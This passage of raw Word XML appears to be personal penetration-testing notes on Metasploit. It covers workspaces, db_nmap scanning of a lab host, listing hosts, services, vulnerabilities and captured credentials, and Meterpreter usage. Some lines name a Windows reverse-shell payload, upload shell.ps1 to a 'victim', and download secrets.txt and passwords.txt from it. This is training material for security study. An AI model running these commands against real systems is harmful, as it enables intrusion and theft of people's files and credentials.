        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Spaces are a helper divider to help you organize different penetration testings, and save findings, like nmap. Workspaces also get saved even after you shut down computer.</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Initializing workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">workspace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells you what workspace you are currently in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">workspace -a [INSERT_NAME]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a workspace</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Nmap inside workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's populate the database and get familiar with some of the Database Backend Commands. For this, we'll scan BRUTE2 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is a wrapper to execute Nmap inside Metasploit and save the findings in the database. The command has identical syntax to Nmap:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap -A 192.168.50.202</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap scan and this also saves all the hosts in metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Displays all the hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running db_nmap, all the host information is saved in msf automatically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services -p 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">display the discovered services from our port scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second one filters by port number</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1xoj8lcjzwri" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Miscellaneous </w:t>
      </w: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Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:auxiliary smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search for all SMB auxiliary modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find one you like, like number 56, then you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1477"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use 56</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Vulnerabilities and Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running a module, you can run this command to see if metasploit automatically found a vulnerability,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostly for scanners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running a scanner module that finds credentials (ex. bruteforce), you can run this command to display them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000500">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>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Information about module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000503">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this while inside of a module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="72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505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows options for the exploit, like what RHOSTS and stuff</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2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_toau08fuka4w" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter and Staged Payloads</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT: Meterpreter and staged payloads both need Metasploit handler (multi/handler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For meterpreter, use a payload like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for windows reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And the best thing about meterpreter is that you can upload and download between this and your local kali, so no need to set up python host and curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000510">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload /path/to/local/file.txt C:\\Users\\victim\\Desktop\\file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000512">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Uploads shell.ps1 to the current Meterpreter directory on the victim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download C:\\Users\\victim\\Desktop\\secrets.txt /home/kali/secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000515">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download C:\\Users\\victim\\Desktop\\passwords.txt</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353"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">double backslashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> \\ or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> single forward slashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / in Windows paths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000519">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1353"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter handles both.</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Quick guide on how to use multi/handler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
